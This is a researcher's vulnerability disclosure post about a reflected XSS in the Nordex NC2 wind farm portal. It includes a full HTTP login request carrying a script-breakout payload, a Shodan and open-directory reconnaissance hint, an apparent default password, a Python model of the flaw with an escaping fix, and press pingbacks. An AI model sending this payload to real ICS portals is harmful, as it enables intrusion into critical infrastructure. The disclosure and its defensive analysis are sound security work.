Nordex NC2 Wind Farm Portal Reflected XSS

Another saved Shodan search, this one for Nordex NC2 Wind Farm Portal software. I copied some of the software (version 11.06.11) over, since it allows open directory browsing (go to /1_07_00/nc2/program_en/ for example), and checked for issues:

POST /login HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/11_06_11/index_en.jsp
Proxy-Connection: Keep-Alive
Content-Length: 129
Content-Type: application/x-www-form-urlencoded

connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27DF%27%29%3C%2Fscript%3E&pw=nordex&language=en
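Added example (my own code, not the portal's): the reflection pattern this payload is shaped for, modelled as a hypothetical login page that writes the submitted userName into an inline script string, beside the JavaScript-string encoding that neutralises it. The template is an assumption inferred from the payload, which closes a string, a function body and the script tag.

```python
from urllib.parse import parse_qs

# Request body quoted in the post above (URL-encoded form fields).
BODY = ("connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E"
        "%3Cscript%3Ealert%28%27DF%27%29%3C%2Fscript%3E&pw=nordex&language=en")

# Hypothetical page fragment (assumption, not the portal's real markup): the
# submitted user name is echoed into a JavaScript string inside a function.
TEMPLATE = "<script>function retry(){ setName('{NAME}'); }</script>"


def user_name(body: str) -> str:
    """Decode the form body and return the userName field as the server sees it."""
    return parse_qs(body)["userName"][0]


def render_vulnerable(name: str) -> str:
    """Raw interpolation: the value lands verbatim in the script block."""
    return TEMPLATE.replace("{NAME}", name)


def _js_escape_char(c: str) -> str:
    cp = ord(c)
    if cp > 0xFFFF:  # astral code point: emit a UTF-16 surrogate pair
        cp -= 0x10000
        return "\\u%04x\\u%04x" % (0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF))
    return "\\u%04x" % cp


def js_string_escape(value: str) -> str:
    """Encode every character outside ASCII [A-Za-z0-9] as \\uXXXX.

    Quotes, ')', ';' and '}' can no longer end the string or the function,
    and '<' is encoded too, so the HTML parser never sees a '</script>' inside
    the literal. The browser's JS engine decodes the escapes back to the
    original value, so legitimate names still work.
    """
    return "".join(c if (c.isascii() and c.isalnum()) else _js_escape_char(c)
                   for c in value)


def render_fixed(name: str) -> str:
    """Same template, value encoded for the JavaScript-string context."""
    return TEMPLATE.replace("{NAME}", js_string_escape(name))


def script_breakout(rendered: str) -> bool:
    """Detection heuristic: a second <script> tag means the value escaped its context."""
    return rendered.lower().count("<script") > 1
```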

[Screenshot: nordex-xss1]

Update: ICS-VU-308064


3 Responses to “Nordex NC2 Wind Farm Portal Reflected XSS”

  1. ICS-CERT Warns of Flaw in Wind Farm Management App | Threatpost | The First Stop For Security News Says:

    […] enables a user to control the settings and operations of wind turbines remotely. A researcher named Darius Freamon discovered a reflected XSS vulnerability in the software and published some details of it in the […]

  2. ICS-CERT Warns of Flaw in Wind Farm Management App « Cyber Security Aid Says:

    […] enables a user to control the settings and operations of wind turbines remotely. A researcher named Darius Freamon discovered a reflected XSS vulnerability in the software and published some details of it in the […]

  3. >kloctalk | Wind turbine software flaw enables remote exploitation Says:

    […] with all Nordex wind turbine generators to monitor and manage turbine production. The issue was first discovered and disclosed by independent researcher Darius Freamon on his blog. The Industrial Control Systems Cyber […]
